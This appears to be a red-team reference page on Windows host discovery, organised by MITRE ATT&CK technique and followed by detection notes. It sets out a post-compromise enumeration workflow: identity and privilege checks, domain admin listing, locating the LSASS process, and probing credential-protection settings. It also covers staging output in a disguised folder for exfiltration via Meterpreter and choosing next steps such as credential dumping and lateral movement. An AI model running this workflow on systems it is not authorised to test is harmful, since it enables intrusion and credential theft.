Skip to main content

T1082 / T1033 / T1069: Host Discovery

Covers: T1082 - System Information Discovery, T1033 - System Owner/User Discovery, T1069 - Permission Groups Discovery, T1016 - System Network Configuration Discovery, T1049 - System Network Connections Enumeration, T1057 - Process Discovery, T1012 - Query Registry


Technique Requirements​

Privileges RequiredUser (most commands) / Administrator (some WMI queries and full process listings)
Effective PermissionsContext of the invoking user
Employment Complexity1/5 - Very Low
Detection Complexity2/5 - Low (commands are routine; volume and sequence is the tell)

Background​

Discovery is the collection of information about the compromised host and its environment. Every technique in this document eventually requires discovery output to proceed - you need to know your privilege level before attempting UAC bypass, the domain structure before lateral movement, and the process list before dumping LSASS.

All commands in this section are built-in Windows utilities. Discovery commands are inherently low-suspicion in isolation; the anomaly is a rapid burst of enumeration commands from a single process within a short window.

Why structure matters: An operator who runs commands randomly wastes time re-querying things they already know and misses context that shapes later decisions. The sections below are organized as a linear workflow - run them in order on every new host.


Workflow: First 10 Minutes on a New Host​

The workflow is organized into five phases. Run each phase completely before moving to the next. Key decisions that branch the operation (privilege escalation path, lateral movement target, credential dump method) are called out inline.

Phase 1: Who Am I?​

Establish your identity and privilege level before anything else. This determines whether you can proceed directly to sensitive operations or need to escalate first.

whoami
whoami /priv
whoami /groups
whoami /all
Output to look forImplication
NT AUTHORITY\SYSTEM or NT AUTHORITY\NETWORK SERVICEAlready SYSTEM - skip UAC bypass
BUILTIN\Administrators in groupsLocal admin context; UAC bypass may be needed
SeDebugPrivilege enabledCan dump LSASS directly - go to T1003 Credential Dumping
SeImpersonatePrivilege enabledPotato attacks possible (not LOL, but note it)
Domain user with no admin groupsNeed local privesc before most persistence/credential techniques

Current directory and environment context:

echo %USERNAME% && echo %USERDOMAIN% && echo %COMPUTERNAME%
echo %LOGONSERVER%
echo %USERPROFILE%
set

%LOGONSERVER% tells you which DC authenticated you. If it matches %COMPUTERNAME%, you are the DC - NTDS.dit is accessible locally.


Phase 2: What Is This Machine?​

systeminfo

systeminfo is the single most information-dense command available. Key fields to extract:

FieldWhy it matters
OS Name / OS VersionDetermines which UAC bypass, IFEO, and accessibility feature techniques apply
DomainConfirms domain membership; WORKGROUP means local accounts only
Logon ServerCorroborates %LOGONSERVER% - identify DC
Hotfix(s)Gaps in patching indicate exploit opportunities (not LOL, but note them)
Network Card(s)Shows all adapters including VPN/internal interfaces not in ipconfig

Focused queries if systeminfo is slow or noisy:

# OS version only
wmic os get Caption,Version,BuildNumber /value

# Hostname and domain
wmic computersystem get Name,Domain,Manufacturer,Model /value

# Installed hotfixes - look for gaps in the KB list
wmic qfe get HotFixID,InstalledOn /value

Phase 3: Who Else Is Here?​

Local Users and Groups​

# All local user accounts
net user

# Details on a specific user (account status, last logon, group membership)
net user <USERNAME>

# All local groups
net localgroup

# Members of the local Administrators group - highest-value targets
net localgroup Administrators

# Remote Desktop Users - who can RDP in
net localgroup "Remote Desktop Users"

Domain Context (if domain-joined)​

# Current domain
net config workstation

# Domain users (if you have connectivity to the DC)
net user /domain

# Domain groups
net group /domain

# Members of Domain Admins - lateral movement targets
net group "Domain Admins" /domain

# Members of Enterprise Admins (forest-wide)
net group "Enterprise Admins" /domain

# Domain controllers in the domain
net group "Domain Controllers" /domain
note

net user /domain and net group /domain query the DC over LDAP. They work from any domain-joined machine with network access to the DC - no special privileges needed for the queries themselves.

Active Sessions​

Who else is currently logged on - other sessions could see your activity:

# Currently logged-in users (interactive sessions)
query user

# All sessions including disconnected RDP
query session

# Net sessions from remote machines (requires admin)
net session

Phase 4: What Does the Network Look Like?​

IP Configuration​

# Full adapter details - all interfaces, DNS servers
ipconfig /all

# ARP cache - what machines has this host recently talked to?
arp -a

# Current routing table
route print

The ARP cache is gold for lateral movement target identification. Every IP in arp -a is a host this machine recently communicated with - they are likely reachable and trusted.

Active Connections​

# All active TCP/UDP connections with process IDs
netstat -ano

# Same, with executable names (requires admin for other users' processes)
netstat -anob

Map the netstat output to processes:

# Correlate PID from netstat to process name
tasklist /FI "PID eq <PID>"

Key things to look for in netstat -ano:

PatternImplication
0.0.0.0:445 or 0.0.0.0:139 LISTENINGSMB is open - lateral movement via net use is viable
0.0.0.0:3389 LISTENINGRDP is enabled - accessible feature backdoor (T1546.008) has remote value
0.0.0.0:5985 or :5986 LISTENINGWinRM is enabled - PowerShell Remoting lateral movement viable
Established connection to an unusual foreign IPPossible existing C2 or outbound pivot

DNS and NetBIOS Name Resolution​

# DNS suffix search list and registered DNS servers
ipconfig /all | findstr /i "dns\|suffix\|search"

# Flush resolver cache (useful before doing your own lookups)
ipconfig /flushdns

# NetBIOS name table for local machine and network
nbtstat -n
nbtstat -r

Network Shares​

# Shares on this machine
net share

# Administrative shares accessible on a remote target (requires credentials)
net view \\<TARGET_IP> /all

Phase 5: What Is Running? What Is Installed?​

Process List​

# All running processes with PID and memory usage
tasklist

# Verbose - includes DLLs loaded by each process (large output)
tasklist /v

# Filter by image name
tasklist /FI "IMAGENAME eq lsass.exe"

# Via WMI - includes command-line arguments (more useful for identifying scripts)
wmic process get Name,ProcessId,ParentProcessId,CommandLine /value

Critical process to identify: lsass.exe PID - needed for the LSASS MiniDump procedure.

# Get LSASS PID directly
tasklist /FI "IMAGENAME eq lsass.exe" /FO LIST

Running Services​

# All running services
sc.exe query type= all state= all

# Services with their binary paths - identify hijackable unquoted paths
wmic service get Name,DisplayName,PathName,StartMode,State /value

# Abbreviated service list via net
net start

Parse the wmic service output for Unquoted Service Path candidates: any PathName with spaces that is not enclosed in quotes.

Scheduled Tasks​

# All scheduled tasks
schtasks /query /fo LIST /v

# Brief output - task name, status, next run time
schtasks /query /fo TABLE

Look for tasks running as SYSTEM with writable script paths - those are hijackable.

Installed Software​

# via WMI - most complete list
wmic product get Name,Version,InstallDate /value

# via registry - faster, includes more entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s /v DisplayName
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s /v DisplayName
note

wmic product get triggers a Windows Installer consistency check on some systems and can be slow (30+ seconds). Use the reg query method if speed matters.


Phase 6: Registry and Configuration Intel​

AutoRun Locations (persistence check)​

# HKLM Run keys - system-wide persistence
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

# HKCU Run keys - current user persistence
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

These show both your own implants (if placed) and any existing persistence from other actors or IT tools.

PowerShell Execution Policy​

reg query HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell /v ExecutionPolicy
reg query HKCU\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell /v ExecutionPolicy

Restricted or AllSigned means unsigned PS scripts are blocked - use -EncodedCommand or inline execution, or use wscript/mshta instead.

AppLocker Policy​

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 /s

If this key exists and has subkeys (Exe, Script, Dll, Msi), AppLocker is configured. The presence of rules under Script means .ps1 files may be blocked - shift to signed binary proxy execution (see T1218).

# WDigest - if UseLogonCredential = 1, plaintext passwords cached in LSASS
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

# LSA Protection - if RunAsPPL = 1, LSASS is a protected process; comsvcs MiniDump blocked
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

# Credential Guard
reg query HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v EnableVirtualizationBasedSecurity
Key / ValueImplication
WDigest\UseLogonCredential = 1Plaintext creds in LSASS - pypykatz will show them
WDigest\UseLogonCredential = 0 or absentHashes only from LSASS; use SAM/NTDS.dit instead
Lsa\RunAsPPL = 1LSASS is PPL-protected; comsvcs MiniDump will fail with access denied
DeviceGuard = 1Credential Guard active; LSASS secrets isolated in VSM - no useful dump

Domain Controller Identification​

# If domain-joined, this returns the DC name
nltest /dclist:<DOMAIN>

# DC for the current machine's domain
nltest /dsgetdc:<DOMAIN>

Output Collection Pattern​

For longer enumeration sessions, redirect output to a staging file for exfiltration:

# Create a staging directory that blends in
mkdir C:\Windows\Temp\perf

# Collect all discovery output into a single file
(
echo === WHOAMI /ALL ===
whoami /all
echo === SYSTEMINFO ===
systeminfo
echo === NET USER ===
net user
echo === NET LOCALGROUP ADMINISTRATORS ===
net localgroup Administrators
echo === NET GROUP DOMAIN ADMINS /DOMAIN ===
net group "Domain Admins" /domain
echo === IPCONFIG /ALL ===
ipconfig /all
echo === ARP -A ===
arp -a
echo === NETSTAT -ANO ===
netstat -ano
echo === TASKLIST ===
tasklist
echo === WMIC PROCESS ===
wmic process get Name,ProcessId,ParentProcessId,CommandLine /value
echo === SCHTASKS ===
schtasks /query /fo LIST /v
echo === SERVICES ===
wmic service get Name,DisplayName,PathName,StartMode,State /value
echo === AUTORUN HKLM ===
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
echo === AUTORUN HKCU ===
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
) > C:\Windows\Temp\perf\sys.txt 2>&1

Exfiltrate via certutil -encode + copy, or leave for pickup via your Meterpreter session:

# Via Meterpreter:
# meterpreter > download C:\\Windows\\Temp\\perf\\sys.txt /tmp/

# Cleanup after retrieval:
del C:\Windows\Temp\perf\sys.txt
rmdir C:\Windows\Temp\perf

Decision Matrix: Where Do You Go Next?​

After running this workflow, your outputs map directly to the next technique to execute:

Discovery FindingNext Step
Running as SYSTEM or SeDebugPrivilege enabledT1003 - Dump LSASS directly
Local Admin, no SYSTEM; UAC presentT1548 - Bypass UAC first
Unquoted service path found in wmic serviceT1574.009 - Unquoted Service Path
WDigest\UseLogonCredential = 0; LSASS not worth dumpingT1003 - SAM/SYSTEM hive export instead
Lsa\RunAsPPL = 1LSASS dump blocked; pivot to SAM/NTDS path
ARP cache shows reachable hosts; SMB openT1021 - Lateral Movement
AppLocker rules on Script/ExeT1218 - Signed Binary Proxy Execution
This machine is a DC (%LOGONSERVER% == %COMPUTERNAME%)T1003.003 - NTDS.dit via Shadow Copy
No admin rights at allEstablish persistence as current user; await elevated trigger

Log Detection​

  • Source: Microsoft-Windows-Sysmon/Operational
    • EventID:1 (ProcessCreate)
      • Rapid sequence of whoami, net, wmic, systeminfo, ipconfig, arp, netstat, reg query from the same parent PID within a short window - individually benign, collectively anomalous
      • wmic process get ... CommandLine - rarely run interactively by legitimate users
      • net group "Domain Admins" /domain - uncommon outside IT admin context
  • Source: Security
    • EventID:4688 (Process creation with command line auditing enabled)
      • Same patterns as above
  • Source: Microsoft-Windows-PowerShell/Operational
    • EventID:4104 (Script block logging)
      • Any PS-based enumeration will appear here if script block logging is enabled